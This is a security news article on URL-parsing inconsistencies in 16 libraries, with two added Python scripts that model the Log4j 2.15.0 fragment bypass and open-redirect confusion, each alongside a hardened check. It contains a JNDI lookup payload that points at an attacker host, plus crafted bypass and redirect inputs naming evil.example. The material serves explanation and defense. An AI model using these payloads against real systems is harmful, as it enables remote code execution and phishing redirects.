Inconsistencies and ambiguities have been discovered in 16 distinct Uniform Resource Locator (URL) parsing libraries, and they could be exploited to bypass validation checks and open the door to a wide range of attacks.
“The URL parsing confusion can cause unexpected behaviour in software (e.g., web application), and could be exploited by threat actors to cause denial-of-service conditions, information leaks, or possibly conduct remote code execution attacks,” the researchers wrote in a report shared with The Hacker News.
Differences in how parsing libraries interpret the same URL pose a substantial risk for users, because URLs are the basic mechanism by which resources, whether local or on the web, are located and retrieved.
A good example is the critical Log4Shell flaw in the widely used Log4j logging framework: when a vulnerable application logs an attacker-controlled string containing a JNDI lookup, the library resolves that lookup, connects to an adversary-controlled server and executes the Java code it receives.
Although the Apache Software Foundation (ASF) quickly shipped a fix (Log4j 2.15.0, which restricted JNDI lookups to local hosts by default), it was soon discovered that the mitigation could be circumvented with a specially crafted input of the form “${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}”, which once again allowed remote JNDI lookups to execute code.
“This bypass derives from the fact that two (!) URL parsers were utilised inside the JNDI lookup process, one for verifying the URL and the other for obtaining it, and the Authority changes depending on how each parser treats the Fragment section (#) of the URL,” the researchers explained.
When the input is parsed as a generic (HTTP-style) URL, the Authority component, the host name plus port number, ends at the fragment delimiter, so the validator sees only “127.0.0[.]1”. When the same input is parsed as an LDAP URL, the parser takes the entire “127.0.0[.]1#.evilhost.com:1389” as the Authority, because the LDAP URL specification (RFC 4516) has no fragment component and treats “#” as an ordinary character.
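The two-parser mismatch described above, as an added illustration in Python (this is not Log4j or the researchers' code): a “validator” parses the lookup target as a generic RFC 3986 URL, where “#” starts the fragment, while a “fetcher” parses it as an RFC 4516 LDAP URL, which has no fragment. The allow-list, the `evil.example` host and the `${jndi:...}` extraction helper are constructed for the example. The hardened variant parses once and additionally refuses any input on which the two parsers disagree.

```python
"""Validator/fetcher parser confusion, modelled on the Log4j 2.15.0 bypass.

Added example, not code from Log4j or from the report. The host names and
allow-list below are constructed for illustration.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"127.0.0.1", "localhost"}  # constructed: what the validator trusts


def extract_lookup(log_message: str) -> str:
    """Pull the URL out of a ${jndi:...} token (toy: whole message must be the token)."""
    if log_message.startswith("${jndi:") and log_message.endswith("}"):
        return log_message[len("${jndi:"):-1]
    raise ValueError("not a jndi lookup token")


def validator_host(url: str) -> str:
    """Host as a generic RFC 3986 parser sees it: the authority ends at '/', '?' or '#'."""
    return urlsplit(url).hostname or ""


def ldap_authority(url: str) -> str:
    """Authority as an RFC 4516 LDAP URL parser sees it.

    ldapurl = scheme "://" [host [":" port]] ["/" dn ...]
    There is no fragment production, so '#' is just another character in the
    host part and the authority only ends at '/' or '?'.
    """
    scheme, sep, rest = url.partition("://")
    if not sep or scheme.lower() not in ("ldap", "ldaps"):
        raise ValueError("not an LDAP URL")
    end = len(rest)
    for ch in "/?":
        i = rest.find(ch)
        if i != -1:
            end = min(end, i)
    return rest[:end]


def fetcher_host_port(url: str):
    """Host and port the LDAP client would try to connect to.
    (No IPv6-literal handling; it is not needed for this illustration.)"""
    authority = ldap_authority(url)
    host, sep, port = authority.rpartition(":")
    if not sep:
        return authority, 389
    return host, int(port)


def vulnerable_lookup(url: str):
    """Validate with one parser, fetch with another.
    Returns (allowed, host_contacted); host_contacted is None when blocked."""
    if validator_host(url) not in ALLOWED_HOSTS:
        return False, None
    host, _port = fetcher_host_port(url)
    return True, host


def hardened_lookup(url: str):
    """Parse once, and refuse outright if the two views of the authority differ:
    the host that is checked against the allow-list is the host that is used."""
    try:
        host, _port = fetcher_host_port(url)
    except ValueError:
        return False, None
    if urlsplit(url).netloc != ldap_authority(url):  # parsers disagree -> refuse
        return False, None
    if host not in ALLOWED_HOSTS:
        return False, None
    return True, host


if __name__ == "__main__":
    # Constructed inputs: a legitimate local lookup, a plainly remote one,
    # and the fragment-smuggling bypass.
    for token in ("${jndi:ldap://127.0.0.1:1389/a}",
                  "${jndi:ldap://evil.example:1389/a}",
                  "${jndi:ldap://127.0.0.1#.evil.example:1389/a}"):
        url = extract_lookup(token)
        print(f"{url}\n  validator sees host {validator_host(url)!r}"
              f"\n  vulnerable: {vulnerable_lookup(url)}"
              f"\n  hardened:   {hardened_lookup(url)}")
```

For the bypass string the validator sees `127.0.0.1` and lets the lookup through, but the LDAP-style parser hands the client `127.0.0.1#.evil.example` as the host to contact; whether that string then resolves to the attacker's server depends on the resolver, which is exactly the kind of platform-dependent behaviour an allow-list check should never have to rely on.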
Indeed, the researchers trace the eight vulnerabilities they found to two root causes: the use of more than one parser in a single code path, and discrepancies that arise when different libraries follow different URL specifications (for example RFC 3986 versus the WHATWG URL standard), each of which presents an exploitable gap.
The inconsistencies range from URLs containing backslashes (“\”), an unusual number of slashes (e.g., https:///www.example[.]com) or percent-encoded data (“%”) to URLs that lack a scheme altogether, and they could be abused to achieve remote code execution as well as denial-of-service (DoS) and open-redirect phishing attacks.
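The slash and backslash confusion just described is what turns a redirect-target check into an open redirect, so here is an added example (not code from the report or from any of the listed projects) that contrasts a naive `urllib.parse.urlsplit`-based check with a small model of how a WHATWG-style browser parser resolves the same string against an `https://` page, followed by a hardened check. `APP_HOST`, `evil.example` and the sample targets are constructed; `browser_host` models only the WHATWG rules that matter here (backslash treated as slash, two or more leading slashes meaning scheme-relative), not the whole standard.

```python
"""Open-redirect validation versus browser URL resolution.

Added example, not code from the report or from the affected projects.
The host and the sample redirect targets are constructed for illustration.
"""
from urllib.parse import urlsplit

APP_HOST = "www.example.com"  # constructed: the application's own host


def _authority_host(s: str) -> str:
    """Host part of an authority string: cut at '/', '?' or '#', drop userinfo and port."""
    end = len(s)
    for ch in "/?#":
        i = s.find(ch)
        if i != -1:
            end = min(end, i)
    authority = s[:end].rpartition("@")[2]
    return authority.split(":")[0].lower()


def browser_host(target: str) -> str:
    """Host a WHATWG-style parser (i.e. a browser) navigates to when `target`
    is resolved against https://APP_HOST/. For special schemes the WHATWG
    parser treats '\\' like '/', and after that any run of two or more leading
    slashes means 'scheme-relative': the authority follows the slashes.
    Percent-encoding is NOT decoded before the split."""
    t = target.replace("\\", "/")
    scheme, sep, rest = t.partition(":")
    if sep and scheme.isalpha() and rest.startswith("//"):  # absolute URL
        return _authority_host(rest.lstrip("/"))
    if t.startswith("//"):                                   # scheme-relative
        return _authority_host(t.lstrip("/"))
    return APP_HOST                                          # path-relative


def is_local_redirect_naive(target: str) -> bool:
    """The pattern behind several of the reported bugs: trust urlsplit's netloc."""
    parts = urlsplit(target)
    return not parts.scheme and not parts.netloc


def is_local_redirect_hardened(target: str) -> bool:
    """Normalise backslashes first, then require exactly one leading slash.
    urlsplit reports netloc '' for '///host', so the explicit '//' check is
    what closes the multiple-slash case."""
    t = target.replace("\\", "/")
    parts = urlsplit(t)
    if parts.scheme or parts.netloc:
        return False
    return t.startswith("/") and not t.startswith("//")


def audit(targets):
    """Return (target, naive_verdict, hardened_verdict, browser_host) per target."""
    return [(t, is_local_redirect_naive(t), is_local_redirect_hardened(t), browser_host(t))
            for t in targets]


if __name__ == "__main__":
    # Constructed redirect targets covering the confusion categories above.
    SAMPLES = [
        "/dashboard",                  # genuinely local
        "//evil.example/x",            # scheme-relative; urlsplit catches this one
        "///evil.example/x",           # extra slash: urlsplit says local, browser goes to evil.example
        "/\\evil.example",             # backslash: same story
        "\\\\evil.example",            # two backslashes: same story
        "/%2F%2Fevil.example",         # percent-encoded: stays a path in the browser
        "https://evil.example:8443/x", # absolute URL with scheme
    ]
    for target, naive, hardened, host in audit(SAMPLES):
        flag = "OPEN REDIRECT" if naive and host != APP_HOST else ""
        print(f"{target!r:32} naive={naive!s:5} hardened={hardened!s:5} browser->{host:18} {flag}")
```

The hardened check deliberately rejects scheme-less relative paths such as `dashboard` as well; if the application needs them, resolve the target against its own base URL and compare hosts rather than loosening the prefix rule. The percent-encoded case is only safe as long as nothing downstream decodes it and parses the result again, which is the third confusion category the researchers describe.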
The vulnerabilities detected, all of which have since been fixed by their respective maintainers, include:
Belledonne's SIP Stack (C, CVE-2021-33056)
Nagios XI (PHP, CVE-2021-37352)
Flask-Security (Python, CVE-2021-23385)
Flask-Security-Too (Python, CVE-2021-32618)
Flask-Unchained (Python, CVE-2021-23393)
Flask-User (Python, CVE-2021-23401)
Clearance (Ruby, CVE-2021-23435)
“Different parsing primitives could lead to a variety of real-world attack scenarios,” the researchers added. “It is vital to completely understand which parsers are involved in the entire process [and] the variations between parsers, whether it is their leniency, how they read different faulty URLs, and what types of URLs they support.”